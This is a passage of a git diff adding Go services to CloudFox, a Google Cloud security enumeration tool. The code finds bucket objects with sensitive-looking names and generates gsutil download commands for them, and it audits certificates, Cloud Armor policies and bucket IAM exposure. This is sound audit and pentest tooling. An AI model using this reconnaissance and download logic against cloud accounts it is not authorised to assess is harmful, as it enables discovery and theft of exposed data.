append(sensitiveFiles, *info) + } + } + return nil + }) + + if err != nil && err != iterator.Done { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return sensitiveFiles, nil +} + +func (s *BucketEnumService) checkObjectSensitivity(obj *storage.Object, bucketName, projectID string, patterns []shared.SensitivePattern) *SensitiveFileInfo { + if obj == nil { + return nil + } + + match := shared.MatchFileName(obj.Name, patterns) + if match == nil { + return nil + } + + isPublic := s.isObjectPublic(obj) + + return &SensitiveFileInfo{ + BucketName: bucketName, + ObjectName: obj.Name, + ProjectID: projectID, + Size: int64(obj.Size), + ContentType: obj.ContentType, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: match.Description, + DownloadCmd: fmt.Sprintf("gsutil cp gs://%s/%s .", bucketName, obj.Name), + Updated: obj.Updated, + StorageClass: obj.StorageClass, + IsPublic: isPublic, + Encryption: s.getObjectEncryption(obj), + } +} + +// isObjectPublic checks if an object has public access via ACLs +func (s *BucketEnumService) isObjectPublic(obj *storage.Object) bool { + if obj == nil || obj.Acl == nil { + return false + } + + for _, acl := range obj.Acl { + // Check for public access entities + if acl.Entity == "allUsers" || acl.Entity == "allAuthenticatedUsers" { + return true + } + } + + return false +} + +// getObjectEncryption returns the encryption type for an object +// Returns "CMEK (key-name)" if using customer-managed key, or "Google-managed" otherwise +func (s *BucketEnumService) getObjectEncryption(obj *storage.Object) string { + if obj == nil { + return "Google-managed" + } + + // Check if the object uses a customer-managed encryption key (CMEK) + if obj.KmsKeyName != "" { + // Extract just the key name from the full resource path + // Format: projects/{project}/locations/{location}/keyRings/{keyRing}/cryptoKeys/{key}/cryptoKeyVersions/{version} + keyParts := strings.Split(obj.KmsKeyName, "/") + if len(keyParts) >= 8 { + // Get the key name (index 7 is cryptoKeys/{key}) + keyName := keyParts[7] + return fmt.Sprintf("CMEK (%s)", keyName) + } + return "CMEK" + } + + // Default is Google-managed encryption + return "Google-managed" +} + +// ObjectInfo represents any file in a bucket (for full enumeration) +type ObjectInfo struct { + BucketName string `json:"bucketName"` + ObjectName string `json:"objectName"` + ProjectID string `json:"projectId"` + Size int64 `json:"size"` + ContentType string `json:"contentType"` + Updated string `json:"updated"` + StorageClass string `json:"storageClass"` + IsPublic bool `json:"isPublic"` + DownloadCmd string `json:"downloadCmd"` + Encryption string `json:"encryption"` // Encryption type (Google-managed or CMEK key name) +} + +// EnumerateAllBucketObjects lists ALL objects in a bucket (no filtering) +func (s *BucketEnumService) EnumerateAllBucketObjects(bucketName, projectID string, maxObjects int) ([]ObjectInfo, error) { + ctx := context.Background() + + storageService, err := s.getStorageService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var objects []ObjectInfo + objectCount := 0 + + // List objects in the bucket + req := storageService.Objects.List(bucketName) + + err = req.Pages(ctx, func(objList *storage.Objects) error { + for _, obj := range objList.Items { + if maxObjects > 0 && objectCount >= maxObjects { + return iterator.Done + } + + isPublic := s.isObjectPublic(obj) + + objects = append(objects, ObjectInfo{ + BucketName: bucketName, + ObjectName: obj.Name, + ProjectID: projectID, + Size: int64(obj.Size), + ContentType: obj.ContentType, + Updated: obj.Updated, + StorageClass: obj.StorageClass, + IsPublic: isPublic, + DownloadCmd: fmt.Sprintf("gsutil cp gs://%s/%s .", bucketName, obj.Name), + Encryption: s.getObjectEncryption(obj), + }) + objectCount++ + } + return nil + }) + + if err != nil && err != iterator.Done { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return objects, nil +} + +// GetBucketsList lists all buckets in a project +func (s *BucketEnumService) GetBucketsList(projectID string) ([]string, error) { + ctx := context.Background() + + storageService, err := s.getStorageService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var buckets []string + err = storageService.Buckets.List(projectID).Pages(ctx, func(bucketList *storage.Buckets) error { + for _, bucket := range bucketList.Items { + buckets = append(buckets, bucket.Name) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return buckets, nil +} diff --git a/gcp/services/certManagerService/certManagerService.go b/gcp/services/certManagerService/certManagerService.go new file mode 100644 index 00000000..ba37a8c6 --- /dev/null +++ b/gcp/services/certManagerService/certManagerService.go @@ -0,0 +1,273 @@ +package certmanagerservice + +import ( + "context" + "fmt" + "strings" + "time" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + certificatemanager "google.golang.org/api/certificatemanager/v1" + compute "google.golang.org/api/compute/v1" +) + +type CertManagerService struct { + session *gcpinternal.SafeSession +} + +func New() *CertManagerService { + return &CertManagerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *CertManagerService { + return &CertManagerService{ + session: session, + } +} + +// Certificate represents an SSL/TLS certificate +type Certificate struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Type string `json:"type"` // SELF_MANAGED, GOOGLE_MANAGED + Domains []string `json:"domains"` + ExpireTime string `json:"expireTime"` + DaysUntilExpiry int `json:"daysUntilExpiry"` + State string `json:"state"` + IssuanceState string `json:"issuanceState"` + AttachedTo []string `json:"attachedTo"` // LBs or other resources + Wildcard bool `json:"wildcard"` + Expired bool `json:"expired"` + SelfManaged bool `json:"selfManaged"` +} + +// SSLCertificate represents a compute SSL certificate (classic) +type SSLCertificate struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Type string `json:"type"` // SELF_MANAGED, MANAGED + Domains []string `json:"domains"` + ExpireTime string `json:"expireTime"` + DaysUntilExpiry int `json:"daysUntilExpiry"` + CreationTime string `json:"creationTime"` + Wildcard bool `json:"wildcard"` + Expired bool `json:"expired"` + SelfManaged bool `json:"selfManaged"` +} + +// CertificateMap represents a Certificate Manager certificate map +type CertificateMap struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + EntryCount int `json:"entryCount"` + Certificates []string `json:"certificates"` +} + +// getCertManagerService returns a Certificate Manager service client using cached session if available +func (s *CertManagerService) getCertManagerService(ctx context.Context) (*certificatemanager.Service, error) { + if s.session != nil { + return sdk.CachedGetCertificateManagerService(ctx, s.session) + } + return certificatemanager.NewService(ctx) +} + +// getComputeService returns a Compute service client using cached session if available +func (s *CertManagerService) getComputeService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + +// GetCertificates retrieves Certificate Manager certificates +func (s *CertManagerService) GetCertificates(projectID string) ([]Certificate, error) { + ctx := context.Background() + service, err := s.getCertManagerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "certificatemanager.googleapis.com") + } + + var certificates []Certificate + + // List certificates in all locations (global and regional) + locations := []string{"global"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + resp, err := service.Projects.Locations.Certificates.List(parent).Context(ctx).Do() + if err != nil { + continue // May not have permissions or no certificates + } + + for _, cert := range resp.Certificates { + c := Certificate{ + Name: extractNameFromPath(cert.Name), + ProjectID: projectID, + Location: location, + Domains: cert.SanDnsnames, + } + + // Determine type and state + if cert.Managed != nil { + c.Type = "GOOGLE_MANAGED" + c.State = cert.Managed.State + c.IssuanceState = cert.Managed.State + } else if cert.SelfManaged != nil { + c.Type = "SELF_MANAGED" + c.State = "ACTIVE" // Self-managed certs are active if they exist + c.SelfManaged = true + } + + // Parse expiration + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 + } + } + + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break + } + } + + certificates = append(certificates, c) + } + } + + return certificates, nil +} + +// GetSSLCertificates retrieves classic Compute Engine SSL certificates +func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertificate, error) { + ctx := context.Background() + service, err := s.getComputeService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var certificates []SSLCertificate + + // Get all SSL certificates (global and regional) using AggregatedList + // This only requires compute.sslCertificates.list permission (not compute.regions.list) + req := service.SslCertificates.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SslCertificateAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.SslCertificates == nil { + continue + } + // Extract region from scope name (format: "regions/us-central1" or "global") + region := "" + if strings.HasPrefix(scopeName, "regions/") { + region = strings.TrimPrefix(scopeName, "regions/") + } + + for _, cert := range scopedList.SslCertificates { + c := SSLCertificate{ + Name: cert.Name, + ProjectID: projectID, + Type: cert.Type, + CreationTime: cert.CreationTimestamp, + SelfManaged: cert.Type == "SELF_MANAGED", + } + + // Add region to name for regional certs + if region != "" { + c.Name = fmt.Sprintf("%s (%s)", cert.Name, region) + } + + // Get domains from managed certificate + if cert.Managed != nil { + c.Domains = cert.Managed.Domains + } + + // Parse expiration + if cert.ExpireTime != "" { + c.ExpireTime = cert.ExpireTime + expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) + if err == nil { + c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) + c.Expired = c.DaysUntilExpiry < 0 + } + } + + // Check for wildcard domains + for _, domain := range c.Domains { + if strings.HasPrefix(domain, "*") { + c.Wildcard = true + break + } + } + + certificates = append(certificates, c) + } + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + return certificates, nil +} + +// GetCertificateMaps retrieves certificate maps +func (s *CertManagerService) GetCertificateMaps(projectID string) ([]CertificateMap, error) { + ctx := context.Background() + service, err := s.getCertManagerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "certificatemanager.googleapis.com") + } + + var maps []CertificateMap + + locations := []string{"global"} + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + resp, err := service.Projects.Locations.CertificateMaps.List(parent).Context(ctx).Do() + if err != nil { + continue + } + + for _, certMap := range resp.CertificateMaps { + cm := CertificateMap{ + Name: extractNameFromPath(certMap.Name), + ProjectID: projectID, + Location: location, + } + + // Get entries for this map + entriesResp, err := service.Projects.Locations.CertificateMaps.CertificateMapEntries.List(certMap.Name).Context(ctx).Do() + if err == nil { + cm.EntryCount = len(entriesResp.CertificateMapEntries) + for _, entry := range entriesResp.CertificateMapEntries { + for _, certRef := range entry.Certificates { + cm.Certificates = append(cm.Certificates, extractNameFromPath(certRef)) + } + } + } + + maps = append(maps, cm) + } + } + + return maps, nil +} + +func extractNameFromPath(path string) string { + parts := strings.Split(path, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return path +} diff --git a/gcp/services/cloudArmorService/cloudArmorService.go b/gcp/services/cloudArmorService/cloudArmorService.go new file mode 100644 index 00000000..09f58bb4 --- /dev/null +++ b/gcp/services/cloudArmorService/cloudArmorService.go @@ -0,0 +1,261 @@ +package cloudarmorservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + compute "google.golang.org/api/compute/v1" +) + +type CloudArmorService struct{ + session *gcpinternal.SafeSession +} + +func New() *CloudArmorService { + return &CloudArmorService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *CloudArmorService { + return &CloudArmorService{ + session: session, + } +} + +// SecurityPolicy represents a Cloud Armor security policy +type SecurityPolicy struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + Type string `json:"type"` // CLOUD_ARMOR, CLOUD_ARMOR_EDGE, CLOUD_ARMOR_NETWORK + RuleCount int `json:"ruleCount"` + Rules []SecurityRule `json:"rules"` + AdaptiveProtection bool `json:"adaptiveProtection"` + DDOSProtection string `json:"ddosProtection"` + AttachedResources []string `json:"attachedResources"` + Weaknesses []string `json:"weaknesses"` +} + +// SecurityRule represents a rule within a security policy +type SecurityRule struct { + Priority int64 `json:"priority"` + Description string `json:"description"` + Action string `json:"action"` // allow, deny, redirect, rate_based_ban, throttle + Match string `json:"match"` // Simplified match expression + Preview bool `json:"preview"` + RateLimitConfig *RateLimitInfo `json:"rateLimitConfig,omitempty"` +} + +// RateLimitInfo contains rate limiting configuration +type RateLimitInfo struct { + ThresholdCount int64 `json:"thresholdCount"` + IntervalSec int64 `json:"intervalSec"` + ExceedAction string `json:"exceedAction"` +} + +// getService returns a Compute service client using cached session if available +func (s *CloudArmorService) getService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + +// GetSecurityPolicies retrieves all Cloud Armor security policies +func (s *CloudArmorService) GetSecurityPolicies(projectID string) ([]SecurityPolicy, error) { + ctx := context.Background() + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var policies []SecurityPolicy + + // List security policies + resp, err := service.SecurityPolicies.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, policy := range resp.Items { + sp := SecurityPolicy{ + Name: policy.Name, + ProjectID: projectID, + Description: policy.Description, + Type: policy.Type, + RuleCount: len(policy.Rules), + Rules: []SecurityRule{}, + AttachedResources: []string{}, + Weaknesses: []string{}, + } + + // Check adaptive protection + if policy.AdaptiveProtectionConfig != nil && + policy.AdaptiveProtectionConfig.Layer7DdosDefenseConfig != nil { + sp.AdaptiveProtection = policy.AdaptiveProtectionConfig.Layer7DdosDefenseConfig.Enable + } + + // Check DDoS protection + if policy.DdosProtectionConfig != nil { + sp.DDOSProtection = policy.DdosProtectionConfig.DdosProtection + } + + // Parse rules + for _, rule := range policy.Rules { + sr := SecurityRule{ + Priority: rule.Priority, + Description: rule.Description, + Action: rule.Action, + Preview: rule.Preview, + } + + // Parse match expression + if rule.Match != nil { + if rule.Match.Expr != nil { + sr.Match = rule.Match.Expr.Expression + } else if rule.Match.VersionedExpr != "" { + sr.Match = rule.Match.VersionedExpr + } else if rule.Match.Config != nil { + // Source IP ranges + if len(rule.Match.Config.SrcIpRanges) > 0 { + sr.Match = fmt.Sprintf("srcIpRanges: %s", strings.Join(rule.Match.Config.SrcIpRanges, ", ")) + } + } + } + + // Rate limit config + if rule.RateLimitOptions != nil { + sr.RateLimitConfig = &RateLimitInfo{ + ExceedAction: rule.RateLimitOptions.ExceedAction, + } + if rule.RateLimitOptions.RateLimitThreshold != nil { + sr.RateLimitConfig.ThresholdCount = rule.RateLimitOptions.RateLimitThreshold.Count + sr.RateLimitConfig.IntervalSec = rule.RateLimitOptions.RateLimitThreshold.IntervalSec + } + } + + sp.Rules = append(sp.Rules, sr) + } + + // Find attached resources (backend services using this policy) + sp.AttachedResources = s.findAttachedResources(ctx, service, projectID, policy.Name) + + // Analyze for weaknesses + sp.Weaknesses = s.analyzePolicy(sp) + + policies = append(policies, sp) + } + + return policies, nil +} + +// findAttachedResources finds backend services using this security policy +func (s *CloudArmorService) findAttachedResources(ctx context.Context, service *compute.Service, projectID, policyName string) []string { + var resources []string + + // Check backend services + backendServices, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err == nil { + for _, bs := range backendServices.Items { + if bs.SecurityPolicy != "" && strings.HasSuffix(bs.SecurityPolicy, "/"+policyName) { + resources = append(resources, fmt.Sprintf("backend-service:%s", bs.Name)) + } + } + } + + return resources +} + +// analyzePolicy checks for security weaknesses in the policy +func (s *CloudArmorService) analyzePolicy(policy SecurityPolicy) []string { + var weaknesses []string + + // Check if policy is attached to anything + if len(policy.AttachedResources) == 0 { + weaknesses = append(weaknesses, "Policy not attached to any backend service") + } + + // Check for overly permissive rules + hasDefaultAllow := false + hasDenyRules := false + previewOnlyCount := 0 + allowAllIPsCount := 0 + + for _, rule := range policy.Rules { + if rule.Priority == 2147483647 && rule.Action == "allow" { + hasDefaultAllow = true + } + if strings.HasPrefix(rule.Action, "deny") { + hasDenyRules = true + } + if rule.Preview { + previewOnlyCount++ + } + // Check for allow rules that match all IPs + if rule.Action == "allow" && (rule.Match == "*" || rule.Match == "srcIpRanges: *" || + strings.Contains(rule.Match, "0.0.0.0/0") || rule.Match == "true") { + allowAllIPsCount++ + } + } + + if hasDefaultAllow && !hasDenyRules { + weaknesses = append(weaknesses, "Default allow rule with no deny rules") + } + + if previewOnlyCount > 0 { + weaknesses = append(weaknesses, fmt.Sprintf("%d rule(s) in preview mode", previewOnlyCount)) + } + + if allowAllIPsCount > 0 && !hasDenyRules { + weaknesses = append(weaknesses, "Has allow-all rules without deny rules") + } + + // Check adaptive protection + if !policy.AdaptiveProtection { + weaknesses = append(weaknesses, "Adaptive protection not enabled") + } + + // Check for common WAF rules + hasOWASPRules := false + for _, rule := range policy.Rules { + matchLower := strings.ToLower(rule.Match) + if strings.Contains(matchLower, "sqli") || strings.Contains(matchLower, "xss") || + strings.Contains(matchLower, "rce") || strings.Contains(matchLower, "lfi") { + hasOWASPRules = true + break + } + } + + if !hasOWASPRules { + weaknesses = append(weaknesses, "No OWASP/WAF rules detected") + } + + return weaknesses +} + +// GetUnprotectedLoadBalancers finds load balancers without Cloud Armor protection +func (s *CloudArmorService) GetUnprotectedLoadBalancers(projectID string) ([]string, error) { + ctx := context.Background() + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var unprotected []string + + // Get all backend services + backendServices, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, bs := range backendServices.Items { + if bs.SecurityPolicy == "" { + unprotected = append(unprotected, bs.Name) + } + } + + return unprotected, nil +} diff --git a/gcp/services/cloudStorageService/cloudStorageService.go b/gcp/services/cloudStorageService/cloudStorageService.go index c91f071a..a6511719 100644 --- a/gcp/services/cloudStorageService/cloudStorageService.go +++ b/gcp/services/cloudStorageService/cloudStorageService.go @@ -3,38 +3,108 @@ package cloudstorageservice import ( "context" "fmt" + "strings" + "time" + "cloud.google.com/go/iam" "cloud.google.com/go/storage" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/iterator" + storageapi "google.golang.org/api/storage/v1" ) type CloudStorageService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new CloudStorageService (requires session for SDK caching) func New() *CloudStorageService { return &CloudStorageService{} } -// type ObjectInfo struct { -// ObjectName string `json:"objecttName"` -// ObjectSizeBytes float64 `json:"objectSizeBytes"` -// IsPublic bool `json:"isPublic"` -// } +// NewWithSession creates a CloudStorageService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *CloudStorageService { + return &CloudStorageService{session: session} +} + +// IAMBinding represents a single IAM binding on a bucket +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} +// LifecycleRule represents a single lifecycle rule on a bucket +type LifecycleRule struct { + Action string `json:"action"` // Delete, SetStorageClass, AbortIncompleteMultipartUpload + StorageClass string `json:"storageClass"` // Target storage class (for SetStorageClass) + AgeDays int64 `json:"ageDays"` // Age condition in days + NumVersions int64 `json:"numVersions"` // Number of newer versions condition + IsLive *bool `json:"isLive"` // Whether object is live (vs archived) + MatchesPrefix string `json:"matchesPrefix"` // Object name prefix match + MatchesSuffix string `json:"matchesSuffix"` // Object name suffix match + MatchesStorage string `json:"matchesStorage"` // Storage class match + CreatedBefore string `json:"createdBefore"` // Created before date condition + DaysSinceCustom int64 `json:"daysSinceCustom"` // Days since custom time + DaysSinceNoncurrent int64 `json:"daysSinceNoncurrent"` // Days since became noncurrent +} + +// BucketInfo contains bucket metadata and security-relevant configuration type BucketInfo struct { + // Basic info Name string `json:"name"` Location string `json:"location"` ProjectID string `json:"projectID"` + + // Security-relevant fields + PublicAccessPrevention string `json:"publicAccessPrevention"` // "enforced", "inherited", or "unspecified" + UniformBucketLevelAccess bool `json:"uniformBucketLevelAccess"` // true = IAM only, no ACLs + VersioningEnabled bool `json:"versioningEnabled"` // Object versioning + RequesterPays bool `json:"requesterPays"` // Requester pays enabled + DefaultEventBasedHold bool `json:"defaultEventBasedHold"` // Event-based hold on new objects + LoggingEnabled bool `json:"loggingEnabled"` // Access logging enabled + LogBucket string `json:"logBucket"` // Destination bucket for logs + EncryptionType string `json:"encryptionType"` // "Google-managed", "CMEK", or "CSEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + RetentionPolicyEnabled bool `json:"retentionPolicyEnabled"` // Retention policy set + RetentionPeriodDays int64 `json:"retentionPeriodDays"` // Retention period in days + RetentionPolicyLocked bool `json:"retentionPolicyLocked"` // Retention policy is locked (immutable) + SoftDeleteEnabled bool `json:"softDeleteEnabled"` // Soft delete policy enabled + SoftDeleteRetentionDays int64 `json:"softDeleteRetentionDays"` // Soft delete retention in days + StorageClass string `json:"storageClass"` // Default storage class + AutoclassEnabled bool `json:"autoclassEnabled"` // Autoclass feature enabled + AutoclassTerminalClass string `json:"autoclassTerminalClass"` // Terminal storage class for autoclass + + // Lifecycle configuration + LifecycleEnabled bool `json:"lifecycleEnabled"` // Has lifecycle rules + LifecycleRuleCount int `json:"lifecycleRuleCount"` // Number of lifecycle rules + LifecycleRules []LifecycleRule `json:"lifecycleRules"` // Parsed lifecycle rules + HasDeleteRule bool `json:"hasDeleteRule"` // Has a delete action rule + HasArchiveRule bool `json:"hasArchiveRule"` // Has a storage class transition rule + ShortestDeleteDays int64 `json:"shortestDeleteDays"` // Shortest delete age in days + TurboReplication bool `json:"turboReplication"` // Turbo replication enabled (dual-region) + LocationType string `json:"locationType"` // "region", "dual-region", or "multi-region" + + // Public access indicators + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings"` // IAM policy bindings on the bucket + + // Timestamps + Created string `json:"created"` + Updated string `json:"updated"` } func (cs *CloudStorageService) Buckets(projectID string) ([]BucketInfo, error) { ctx := context.Background() - client, err := storage.NewClient(ctx) + + // Get cached client from SDK + client, err := cs.getClient(ctx) if err != nil { - return nil, fmt.Errorf("Failed to create client: %v", err) + return nil, err } - defer client.Close() var buckets []BucketInfo bucketIterator := client.Buckets(ctx, projectID) @@ -46,72 +116,286 @@ func (cs *CloudStorageService) Buckets(projectID string) ([]BucketInfo, error) { if err != nil { return nil, err } - bucket := BucketInfo{Name: battrs.Name, Location: battrs.Location, ProjectID: projectID} + + bucket := BucketInfo{ + Name: battrs.Name, + Location: battrs.Location, + ProjectID: projectID, + } + + // Security fields + bucket.PublicAccessPrevention = publicAccessPreventionToString(battrs.PublicAccessPrevention) + bucket.UniformBucketLevelAccess = battrs.UniformBucketLevelAccess.Enabled + bucket.VersioningEnabled = battrs.VersioningEnabled + bucket.RequesterPays = battrs.RequesterPays + bucket.DefaultEventBasedHold = battrs.DefaultEventBasedHold + bucket.StorageClass = battrs.StorageClass + + // Logging + if battrs.Logging != nil { + bucket.LoggingEnabled = battrs.Logging.LogBucket != "" + bucket.LogBucket = battrs.Logging.LogBucket + } + + // Encryption + if battrs.Encryption != nil && battrs.Encryption.DefaultKMSKeyName != "" { + bucket.EncryptionType = "CMEK" + bucket.KMSKeyName = battrs.Encryption.DefaultKMSKeyName + } else { + bucket.EncryptionType = "Google-managed" + } + + // Retention Policy + if battrs.RetentionPolicy != nil { + bucket.RetentionPolicyEnabled = true + bucket.RetentionPeriodDays = int64(battrs.RetentionPolicy.RetentionPeriod.Hours() / 24) + bucket.RetentionPolicyLocked = battrs.RetentionPolicy.IsLocked + } + + // Autoclass + if battrs.Autoclass != nil && battrs.Autoclass.Enabled { + bucket.AutoclassEnabled = true + bucket.AutoclassTerminalClass = battrs.Autoclass.TerminalStorageClass + } + + // Timestamps + if !battrs.Created.IsZero() { + bucket.Created = battrs.Created.Format("2006-01-02") + } + + // Get additional fields via REST API (SoftDeletePolicy, Updated) + cs.enrichBucketFromRestAPI(ctx, &bucket) + + // Get IAM policy for the bucket + iamBindings, isPublic, publicAccess := cs.getBucketIAMPolicy(ctx, client, battrs.Name) + bucket.IAMBindings = iamBindings + bucket.IsPublic = isPublic + bucket.PublicAccess = publicAccess + buckets = append(buckets, bucket) } return buckets, nil } -// func (cs *CloudStorageService) BucketsWithMetaData(projectID string) (map[string][]BucketInfo, error) { -// buckets, _ := cs.Buckets(projectID) -// bucketInfos := make(map[string][]BucketInfo) -// ctx := context.Background() -// client, err := storage.NewClient(ctx) -// if err != nil { -// return nil, fmt.Errorf("Failed to create client: %v", err) -// } -// for { -// bucketAttrs, err := buckets.Next() -// if err == iterator.Done { -// break -// } -// if err != nil { -// return nil, fmt.Errorf("failed to list buckets: %v", err) -// } - -// bucketName := bucketAttrs.Name -// log.Printf("Working on bucket %s", bucketName) - -// // List all objects in the bucket and calculate total size -// totalSize := int64(0) -// var objects []ObjectInfo -// it := client.Bucket(bucketName).Objects(ctx, nil) -// for { -// objectAttrs, err := it.Next() -// if err == iterator.Done { -// break -// } -// if err != nil { -// return nil, fmt.Errorf("failed to list objects in bucket %s: %v", bucketName, err) -// } - -// // Get size -// objectSize := objectAttrs.Size -// totalSize += objectSize - -// // Check if public -// isPublic := false -// for _, rule := range objectAttrs.ACL { -// if rule.Entity == storage.AllUsers { -// isPublic = true -// break -// } -// } - -// objects = append(objects, ObjectInfo{ObjectName: objectAttrs.Name, ObjectSizeBytes: float64(objectSize), IsPublic: isPublic}) - -// if totalSize > 3221225472 { // 3 GiB in bytes -// log.Printf("%s bucket is over 3 GiB. Skipping remaining objects in this bucket...", bucketName) -// break -// } -// } -// bucketSizeMB := float64(totalSize) / 1024 / 1024 -// bucketInfos[projectID] = append(bucketInfos[projectID], BucketInfo{BucketName: bucketName, BucketSizeMB: bucketSizeMB, Objects: objects}) -// } -// log.Printf("Sorting resulting list of buckets in descending order %s", projectID) -// sort.Slice(bucketInfos[projectID], func(i, j int) bool { -// return bucketInfos[projectID][i].BucketSizeMB > bucketInfos[projectID][j].BucketSizeMB -// }) - -// return bucketInfos, nil -// } +// getClient returns a cached storage client from SDK +func (cs *CloudStorageService) getClient(ctx context.Context) (*storage.Client, error) { + if cs.session != nil { + return sdk.CachedGetStorageClient(ctx, cs.session) + } + // Fallback to direct creation for legacy usage (no caching) + return storage.NewClient(ctx) +} + +// getStorageService returns a cached storage REST API service from SDK +func (cs *CloudStorageService) getStorageService(ctx context.Context) (*storageapi.Service, error) { + if cs.session != nil { + return sdk.CachedGetStorageService(ctx, cs.session) + } + // Fallback to direct creation for legacy usage (no caching) + return storageapi.NewService(ctx) +} + +// getBucketIAMPolicy retrieves the IAM policy for a bucket and checks for public access +func (cs *CloudStorageService) getBucketIAMPolicy(ctx context.Context, client *storage.Client, bucketName string) ([]IAMBinding, bool, string) { + var bindings []IAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + policy, err := client.Bucket(bucketName).IAM().Policy(ctx) + if err != nil { + // Return empty bindings if we can't get the policy (permission denied, etc.) + return bindings, false, "Unknown" + } + + // Convert IAM policy to our binding format + for _, role := range policy.Roles() { + members := policy.Members(role) + if len(members) > 0 { + binding := IAMBinding{ + Role: string(role), + Members: make([]string, len(members)), + } + for i, member := range members { + binding.Members[i] = member + + // Check for public access + if member == string(iam.AllUsers) { + hasAllUsers = true + isPublic = true + } + if member == string(iam.AllAuthenticatedUsers) { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + bindings = append(bindings, binding) + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + +// GetBucketIAMPolicyOnly retrieves just the IAM policy for a specific bucket +func (cs *CloudStorageService) GetBucketIAMPolicyOnly(bucketName string) ([]IAMBinding, error) { + ctx := context.Background() + + client, err := cs.getClient(ctx) + if err != nil { + return nil, err + } + + bindings, _, _ := cs.getBucketIAMPolicy(ctx, client, bucketName) + return bindings, nil +} + +// publicAccessPreventionToString converts the PublicAccessPrevention type to a readable string +func publicAccessPreventionToString(pap storage.PublicAccessPrevention) string { + switch pap { + case storage.PublicAccessPreventionEnforced: + return "enforced" + case storage.PublicAccessPreventionInherited: + return "inherited" + default: + return "unspecified" + } +} + +// FormatIAMBindings formats IAM bindings for display +func FormatIAMBindings(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "No IAM bindings" + } + + var parts []string + for _, binding := range bindings { + memberStr := strings.Join(binding.Members, ", ") + parts = append(parts, fmt.Sprintf("%s: [%s]", binding.Role, memberStr)) + } + return strings.Join(parts, "; ") +} + +// FormatIAMBindingsShort formats IAM bindings in a shorter format for table display +func FormatIAMBindingsShort(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "-" + } + return fmt.Sprintf("%d binding(s)", len(bindings)) +} + +// enrichBucketFromRestAPI fetches additional bucket fields via the REST API +// that may not be available in the Go SDK version +func (cs *CloudStorageService) enrichBucketFromRestAPI(ctx context.Context, bucket *BucketInfo) { + service, err := cs.getStorageService(ctx) + if err != nil { + // Silently fail - these are optional enrichments + return + } + + // Get bucket details via REST API + restBucket, err := service.Buckets.Get(bucket.Name).Context(ctx).Do() + if err != nil { + // Silently fail - these are optional enrichments + return + } + + // Parse SoftDeletePolicy + if restBucket.SoftDeletePolicy != nil { + if 